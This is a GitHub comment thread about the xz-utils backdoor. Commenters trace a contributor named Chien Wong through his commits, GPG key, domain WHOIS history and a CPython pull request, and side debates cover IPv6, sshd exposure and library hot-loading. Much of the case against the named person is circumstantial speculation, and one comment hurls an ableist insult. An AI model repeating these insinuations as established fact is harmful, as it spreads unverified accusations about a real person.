This profile looks organic. My own github activity history has a similar pattern. I'm also bad about keeping my homepage up to date.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

          /* The last A-MSDU subframe has no padding. */
          if (last_subframe)
            subframe_length = 14+msdu_length;
          else
            subframe_length = WS_ROUNDUP_4(14+msdu_length);

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time. That could be the tool he used.

$ gpg --keyserver keyserver.ubuntu.com --recv-key 5CA58A39FA4122AD
$ gpg --list-sig 5CA58A39FA4122AD
pub   ed25519 2022-06-21 [SC] [expires: 2032-06-18]
      615887C24F853CE9191F944E5CA58A39FA4122AD
uid           [ unknown] Chien Wong <m@xv97.com>
sig 3        5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>
sub   cv25519 2022-06-21 [E] [expires: 2032-06-18]
sig          5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>

@x1done
Copy link

x1done commented Apr 3, 2024

Registrant Country of the domain very likely changed to CN on 2023-06-05T11:01:50Z

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-06-05T11:01:50Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2024-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Jiangsu
Registrant Postal Code: DATA REDACTED
Registrant Country: CN
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-09-08T08:08:33Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2023-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2020-05-26T08:11:21Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2021-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: DATA REDACTED

@zacanger
Copy link

zacanger commented Apr 3, 2024

@gonoph

his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

The interesting bit is that it's mixing romanizations. Ch'ien is Wade-Giles, Chien is simplified Wade, and Qian (implied by his work email, qwang) would be pinyin. Wong and Wang are also likely the same name, depending on location. Could definitely be an immigrant to the mainland from Taiwan or overseas, or just changing it based on stylistic preference.

@lhmouse

We do not know how to pronounce 'Chien'.

Qián

@RufusExE
Copy link

RufusExE commented Apr 3, 2024

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

@lhmouse
Copy link

lhmouse commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang':
(https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
[u̯ɑŋ] Wang Wang
[u̯əŋ] Weng Weng
[i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

@orangepizza
Copy link

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc?
thing github sure have it but not sure about lesso's log, it's already logs few years old

@rdebath
Copy link

rdebath commented Apr 3, 2024

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time.

That is 3650 days, exactly the sort of period that would be chosen by someone who believes they have to choose a period but don't want to be bothered by it. In fact I'm not even sure which way (too long or too short) you believe that it is "ridiculous" as it has been used as a popular replacement for "never expires" a lot. I would assume "too long" due to the insecurity and value assumptions about websites of the CAB.

@daniel-dona
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476
Its part of PR python/cpython#115989
The bytecode there seem to be .xz test files from the 5.6.1 release.
Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)
I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:
a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)
Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in. https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

What's the problem with the Gitlab MRs?

@xry111
Copy link

xry111 commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang': (https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
王 [u̯ɑŋ] Wang Wang
翁 [u̯əŋ] Weng Weng
雍 [i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

https://en.wikipedia.org/wiki/Wong_(surname)

@Z-nonymous
Copy link

I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

Thanks @christoofar, that's a great find.

Especially that posts/c-api-design-learned-from-lzma/index.html file.

I find it also weird that one would add the test files from xz while there's actually not used in tests from what I understood.

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

I agree, given the obfuscation to try to make it happen "in plain sight", it would certainly have been prepared with crafted personas to point fingers in a different direction should it be discovered.
There's so many possibilities behind this that at layman level, we can only speculate, and only intelligence agencies can get to the bottom of this.

For those who like to imagine stories, theories and are averse to Occam's razor (others can skip) you can start with checking when gzip was replaced by xz, what the history behind LZMA. You can also check the timelime when JiaT75 was activated. Also remember old news, read wikipedia articles here , there, here and also read tech news like this, or this, and you can imagine hundreds of possible stories. You can also throw away Occam's razor, and imagine others used that to do triple or quadruple finger-pointing indirections.

But don't read too much, one might end up hallucinating more than an LLM.

For sure Intelligence Agencies have mapped out all possibilities and are invistigating all.

@pillowtrucker
Copy link

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago. Not that I believe he's ever even seen AIX or HPUX, but that's a pretty funny claim considering those unixes were notoriously awful and a general laughing stock in terms of engineering AND security.
Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?
I'm not sure if you're really good at masking malice as incompetence, or if you're genuinely a low iq schizophrenic.
All Easter spent trying to blame China.

@Z-nonymous
Copy link

Z-nonymous commented Apr 3, 2024

Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?

Read this https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago.

That CVE 👍 I never understood why one in their right mind would count starting with 0.
Past experience was more of a disclaimer saying I might be wrong, and for sure Linux, bash and gcc work differently. Feel free to understand it as argument of authority if you believe experience 25 years ago on a different OS is what that means.

Also, not sure why you're giving someone adding the compromised unused xz test files into cpython repo more forgiveness than me, when I've disclaimed ahead I'm not expert of the topic and could be wrong.

All Easter spent trying to blame China

Me ? Where ? Just for the joke on previous post added some facts than can just justify there are strong leads to other countries that could be behind it. And it's not even picked up in your claim. Read again and see how I'm making fun of speculating who is behind the attack.

I don't know who, and I don't think it actually matters who is behind the attack.

Maybe it's important to see what is the attack really targetting. There are strong evidences there are parts of the script that try to limit it to some architectures.
As noted by some, some parts make no sense, like previously mentionned checks on $build is when it appears not to work with how it's populated with eval.

Sure x86 is the target, but since other architectures were added recently in past years are these beeing really exempted or targetted too ? Do all those RISC-specific architecture code changes actually belong in all those tools ? Are they supposed to prevent using faulty code on said architecture or not.

Those are legitimate questions. Raising awareness is not accusing a country.

I think it's interesting to remind also some hardware like x86 Intel/AMD have trade bans for some countries actually at war. Maybe in some remote geography that's not that big of a threat. Countries could modify their architecture supply chains to pursue their plans or not.

@AdrianBunk
Copy link

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc? thing github sure have it but not sure about lesso's log, it's already logs few years old

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

@xry111
Copy link

xry111 commented Apr 3, 2024

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc? thing github sure have it but not sure about lesso's log, it's already logs few years old

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

Well, I thought GH was the mirror of git.tukaani.org but the fact is the opposite.

Then maybe MS can find something in the log of GitHub. And maybe we can use GH API to gather some info when the repo is re-enabled.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 3, 2024

@wibeipummedo says: Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there

It's not "bytecode". It's real instructions that you should be able to disassemble.

seem to be .xz test files from the 5.6.1 release.

It happens to be from 5.6.1, but was it added in 5.6.1?

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

It adds bloat, that we are sure of. But as far as the invocation is involved, it is benign and neither runs the code nor triggers the backdoor.

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)

That's a documentation commit. The most parsimonious result would be that Wong, like the unfortunate 1password guy and the... (what's the embedded thing called? anyway, someone went to update the project url and license) guy, is just being too excited about new versions. The only difference is that he's got a Sinitic name.

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!


Re: romanization

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

"Ch'ien Wang" is a more normal spelling under Wade-Giles. I think zacanger has gotten it right. The final change to "Wong" is not-Mandarin, but it's kinda justified by being fashionable.

At least we're still mostly dealing with Mandarin.

@zacanger
Copy link

zacanger commented Apr 3, 2024

@lhmouse

No transliteration scheme for Mandarin

Jyutping (Canto). That does kind of stand out to me, but I'm not a native speaker, I don't know if anyone would usually mix the two.

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

@Artoria2e5 thank you for clarifying

@4i8
Copy link

4i8 commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

@christoofar
Copy link

christoofar commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

define "secure".

If more users pushed to IPv6-only and raise the expense of scanning the network a lot higher, the giant increase of failed tcp dials are easier for network carriers to see and deal with.

any vps/cloud provider not giving you a healthy sized IPv6 range by default is garbage, and configured and turned on in their bake scripts so there is no excuse

cloudflare should demand edges go on to IPv6-only and not have 80/8080/443 open on IPv4, then sunset allowing edges having sshd on standard ports

the IPv4 universe is in a fucked state. I don't know why anyone thinks they can deal with serving anything on that network unless they have an incident response center in 5 time zones. I never serve sshd out on it. Moving the port lowers the scan hits quite a bit, IPv6 drops them waaaay down.

I hate this network I wish it would end.

@christoofar
Copy link

christoofar commented Apr 3, 2024

For those of you who just want a secure way to sshd to do your admin and IPv6 is never happening in the near term, then check out Loki or Yggdrasil. Ygg is dead-easy to set up. Your distro probably already has a package for it, or you can build it yourself. You don't need to join it to public Ygg nodes (by not joining the public Ygg network, that creates your own private IPv6 encrypted network automatically. if any of your peers in your network is configured to join another Ygg network, then that bridges the two networks together).

Within your LAN if IPv6 broadcasting works, nodes you add will find each other and link up. It's like OpenVPN but just-add-water. https://yggdrasil-network.github.io

Then you can iptables/ufw whitelist the nodes you're bridging across IPv4 private-public. This step prevents anyone attacking your Ygg bridge much less seeing it.

You can also whitelist the hostkeys themselves in yggdrasil.conf to limit what can pair. (if you don't do the keys, then do the iptables)

Once you have that up, you can go into sshd_conf on your public server and stop serving out on IPv4 completely or do whatever you need to do to close the port to the Internet.

It also handles the case where your ISP won't even let you host anything---now you can (by setting up Ygg on a vps and going back to your host and adding it as a peer).

@christoofar
Copy link

christoofar commented Apr 4, 2024

Lasse updated his Plans section and mentions that the Jia code may be going to a git museum repo, he will rebase Jia out of xz in a 5.8.0 release.

Plans
I plan to write an article how the backdoor got into the releases and what can be learned from this. I’m still studying the details.

xz.git needs to be gotten to a state where I’m happy to say I fully approve its contents. It’s possible that the recent commits in master will be rebased to purge the malicious files from the Git history so that people don’t download them in any form when they clone the repo. The old repository could still be preserved in a separate read-only repository for history: the contents of its last commit could equal some commit in the new repository.

These will unfortunately but obviously take several days.

A clean XZ Utils release version could jump to 5.8.0. Some wish that it clearly separates the clean one from the bad 5.6.x.

https://tukaani.org/xz-backdoor/

@christoofar
Copy link

with libsystemd rolling out the dlopen() change and OpenSSH adding support for systemd notify...
openssh/openssh-portable@08f5792

sad day for Jia.

@christoofar
Copy link

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog, and made one post, about his excitement of Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and write one test to just pass a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff test bloat oh cool no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork) then called Jia and ask him to pull them down so Jia can then pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo I would have left my tests in my fork and cherry pick out of that branch what I want to send to CPython if I had a board in my lap and wanted Jia's change so I can make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.

@0x1eef
Copy link

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell
Copy link

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface filtering IPs is not really effective.

Reducing the libraries you link is ... for example don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd this why "libelogind0" exists at all and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd
Copy link

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

@duracell
Copy link

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space
  1. It's says “harder”! 2. 17 YEARS are gone, and where is the proof about the 2nd point?

And this is just a presentation.
You should look at the current stages of public scanning or even paper from akamai.
The truth is: Scanning is a lot, lot harder and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more.
Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

@orangepizza
Copy link

orangepizza commented Apr 4, 2024 via email

@bogd
Copy link

bogd commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

I was not replying to you, but to a different message that was quoting you (and in turn it was referring to a message from @christoofar ). Yes, I agree with you on the fail2ban part - it will not protect you from such an exploit. And probably none of the other mentioned workarounds will protect you against an application-level exploit/backdoor.

As for the second part, you missed the point entirely. :) . Yes, IPv6 scanning is harder (nobody ever contested that), but that doesn't mean that this can be used as a "security mechanism". That was what the "ha ha" on the slide was about.

Your first link seems to only talk about IPv4 scanning (and I did not see any relevant statistics on that page).

where is the proof about the 2nd point?

Probably waiting (together with the rest of us) for large-scale IPv6 adoption :p . Even the paper you linked says that:

"It may well be that the relative rarity of largescale IPv6 scans is simply the result of the inability to “cheaply” find destination addresses to probe. However, we argue this situation may quickly change if and when targetable IPv6 addresses become more available, be it due to advances in target generation algorithms, or exposure of addresses, e.g., via peer-to-peer applications or other rendezvous mechanisms employed by future applications"

Anyway, this is not the place for this conversation. Let us get back to the interesting part, the current exploit. :)

@christoofar
Copy link

christoofar commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

I understand that. But the IPv4 universe is still super-fucked. Live targets compacted into a small universe white-hot with scanners. You still have to break defaults when hosting on IPv6 in the lower-temperature environment.

The shitshops/skids would be left having to use advanced techniques and rely on fewer devs and information (analyzing traffic, ingesting pilfered web logs, etc) to harvest target lists. There's just no reason, no reason at all, to put sshd hosted on defaults on to IPv4, which is what most people are doing. Every cloud provider is doing. It's crazytown.

And with xz we have now understood, very well, the issue of hot-loading, which tells you how good the code of OpenSSH has become because that was a technique few people thought feasible in a closed environment. Which systemd is reducing the temperature even more with dlopen() (it doesn't solve it).

@christoofar
Copy link

christoofar commented Apr 4, 2024

Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

The cheapest thing to do is to go after caches of weblogs to collect/guess pools where there are clusters of hosts because Provider X misconfigured and handed out clients a small range. Like astronomers who write image filter code to sort out background stars looking for fuzzy balls that are galaxies or nebulae.

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Everyone has an Internet device talking a lot more on v6 than on v4. It's probably your phone. It's your Starlink router. The future is now. Get sshd off the IPv4 network. Just do it.

If you can't/won't, then why not shove it behind OpenVPN? Or set up port knocking? Or, as I mentioned... take a look at Yggdrasil which gives you a virtual IPv6 encrypted network with minimal fuss with way less setup headache?

@christoofar
Copy link

christoofar commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

Hot-loading is when libA which is doing just fine in production when loaded on to executable hosts, now has a change introduced because libB is going to be hot-loaded (LD_PRELOAD or, as we've seen it's systemd doing it) to make the code in libB get into memory and its initters get called, wanting to change the environment/state/data that libA usually runs under.

That's why the dlopen() changes to systemd matter.

How did liblzma get hotloaded? systemd did that (because journald), and also because OpenSSH did not want to bring in libsystemd to support its UNIX socket notify feature to signal readiness-to-serve. They have to support more OSes than just Linux (primary is BSD). Distros were taking patches to OpenSSH to get sshd to use this feature. THAT step matters because that is what created the hot-loading situation!

But any software, really, is vulnerable to hotloading. You have one thing that runs as root and pulls from an unwatched patching cycle, it is an invitation to hot-load. It doesn't have to be systemd as the root launcher, it can happen inside the ecosphere of some package you run, too.

Laughing and pointing fingers like a dumbshit saying "huhuhuh I run ${FAVORITE_OS} not a problem there"... yeah no ALL software is vuln to this.

@duracell
Copy link

duracell commented Apr 4, 2024

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh.
You connect to ssh with a specific key with includes the malicious commands. Without the ssh connection this exploit wouldn't work.
It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

@christoofar
Copy link

christoofar commented Apr 4, 2024

I should note: there's some software landscapes where hotloading is the norm because that's just the way things go. The Asterisk project is a great example. Plugins are written as C modules/patches so no-surprise that you might need X feature ("I wanna write something that injects custom SIP headers") and you need a dependency elsewhere but you don't want to touch the PJSIP module itself, or you reduce your change to a small nugget to keep up with updates to PJSIP. (Edit: you set the module loading order to your need and then launch with LD_PRELOAD to force your deps in, then your module/patch can do whatever it needs to do to PJSIP. This is just how things work over there.)

In closed-soure vendor land that behavior is everywhere.

Dependency hijacking is a thing .NET people have been dealing with for eons now and they are further ahead (lib signing, centralized and well-understood assembly loading behavior, etc). But, again... everything everywhere is subject to hotloading. Just like injected static includes creeping into an unprotected repo, it can be dynamic, too.

@christoofar
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh. You connect to ssh with a specific key with includes the malicious commands. Without the ssh connection this exploit wouldn't work. It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

I'm going to target your dishwasher. Your dishwasher is the vulnerable component.

@dnorthup-ums
Copy link

dnorthup-ums commented Apr 4, 2024

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

@christoofar
Copy link

christoofar commented Apr 4, 2024

By the way, I have not proven our enthusiastic CPython user is guilty beyond a reasonable doubt of being Team Jia, but this is the most stinky fish of all the associated cross-committers looking to push up Jia's changes.

It's not that Mr. CPython found a 0day in decrypt/encrypt... my suspicion is the audience that Mr. CPython would have created with his PR to CPython. The test he submitted cannot be run unless you force up the dependency, because in the binding code the feature flag is tied to the release level of liblzma. Tinkerboard people tend to be IT professions with day jobs in corporate land. I don't know anyone around me in my inner circle, that is a nerd, who doesn't have a tinkerboard. Granted, not RISCV... but RISCV I'm going to assume audience is the same and more avid tinkerboard project users.

And even if Mr. CPython is completely innocent here... the adoption to push up is there, and when CPython lands for all chipsets and OS platforms everyone's Python code using lzma whether they know it or not will host Jia. Jia now has a worldwide entrypoint to ship to everything, everywhere, even in locked-down shit like QNX if that OS moves up because CPython did.

So... the panicky headlines from the tech press are, to some degree, justified.

Mr. CPython started a promo website all-excited about his interest in the liblzma memory allocator (that is not a memory allocator). And well, I want to testbed the CPython PR that was kicked out against Jia's RISCV feature enhancement. How much of a performance gain is this?

So I have ordered a RISCV tinkerboard off of Amazon.

@fungilife
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.
If you want to be precise, ssh was the vulnerable component

I'm going to target your ..... is the vulnerable component.

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem. They will diffuse and divert the discussion to produce "doubt", "reasonable doubt", and the entire subject will be shoved under the carpet in a short while.

The fact that tests were done on an compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

@ostrosablin
Copy link

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Not only IPv6 is a major failure (since it's adoption is still low), but due to this, it hardly gets tested in many "IPv6-ready" products, if at all.

IPv6 is usable only in corporate environments, managed by team of experienced network engineers. For most end users, it doesn't solve any real problems. In fact, it generates much more security concerns. Generally, enabling IPv6 would expose entire network to public internet. What makes it worse, some cheaper/older consumer routers don't even provide any mechanism to set up IPv6 connection filtering in their stock firmware, and would even happily expose their control panel to public internet.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

@duracell
Copy link

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

The device which does NAT on IPv4 could and in all cases I know is also the device which does the filtering for ipv6 and on default on all consumer products does not allow any incoming connection request. So you have the same firewall security as with NAT but not the problem of port translation and other problems.

@Daniel15
Copy link

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode
Copy link

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums
Copy link

@sectosec

The serious part is that the guy name Neustradamus also pressured to push libzma update to 5.6.0 check : microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob github account, not my personal one...any much of my involvement in Open Source stuff predates github anyway.)

@AdrianBunk
Copy link

Just came here to throw some links :

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
